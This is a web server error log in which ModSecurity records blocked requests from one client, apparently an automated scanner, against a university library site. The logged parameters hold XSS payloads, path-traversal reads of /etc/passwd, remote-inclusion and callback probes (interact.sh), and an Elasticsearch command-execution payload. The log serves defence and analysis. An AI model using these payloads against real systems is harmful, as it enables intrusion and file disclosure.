[Tue Aug 29 11:56:25.607677 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArJXm8AAAAZ"]
[Tue Aug 29 11:56:27.025288 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAqsV88AAAAB"]
[Tue Aug 29 11:56:29.618932 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAArLLegAAAAb"]
[Tue Aug 29 11:56:30.609287 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAArB11YAAAAV"]
[Tue Aug 29 11:56:30.632310 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAqeFpAAAAAx"]
[Tue Aug 29 11:56:32.967922 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4c417fa93f05a6c1142d086a2b81f21f44682fb3"): Internal error [hostname "digilib.unla.ac.id"] [uri "/embed.js"] [unique_id "ZO16gMCo-f0AAArB11wAAAAV"]
[Tue Aug 29 11:56:33.619359 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAq-HcAAAAAT"]
[Tue Aug 29 11:56:34.574765 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAq5@ScAAAAK"]
[Tue Aug 29 11:56:36.552758 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAq-HcgAAAAT"]
[Tue Aug 29 11:56:36.672109 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq3bAIAAAAI"]
[Tue Aug 29 11:56:37.535283 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAArB13EAAAAV"]
[Tue Aug 29 11:56:39.568057 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArZPxoAAAAC"]
[Tue Aug 29 11:56:39.671049 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArZPx8AAAAC"]
[Tue Aug 29 11:56:39.778898 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAqw53MAAAAH"]
[Tue Aug 29 11:56:40.544400 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8MIAAAAS"]
[Tue Aug 29 11:56:40.839457 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAArIAW4AAAAX"]
[Tue Aug 29 11:56:42.851659 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAocymgAAAAR"]
[Tue Aug 29 11:56:43.531073 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAq-He8AAAAT"]
[Tue Aug 29 11:56:43.699101 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArHa6AAAAAJ"]
[Tue Aug 29 11:56:44.553500 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArHa6QAAAAJ"]
[Tue Aug 29 11:56:45.560792 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:173221/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAolK5QAAAAe"]
[Tue Aug 29 11:56:46.561015 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAAqsWBQAAAAB"]
[Tue Aug 29 11:56:46.674626 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:465222/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAq@soEAAAAM"]
[Tue Aug 29 11:56:47.536748 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAqSw90AAAAN"]
[Tue Aug 29 11:56:47.695948 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAqSw@IAAAAN"]
[Tue Aug 29 11:56:48.593558 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAq5@WUAAAAK"]
[Tue Aug 29 11:56:48.776913 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAqqtlkAAAAA"]
[Tue Aug 29 11:56:50.653067 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAqsWC0AAAAB"]
[Tue Aug 29 11:56:51.685345 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "digilib.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAq5@XMAAAAK"]
[Tue Aug 29 11:56:52.642847 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArIAbUAAAAX"]
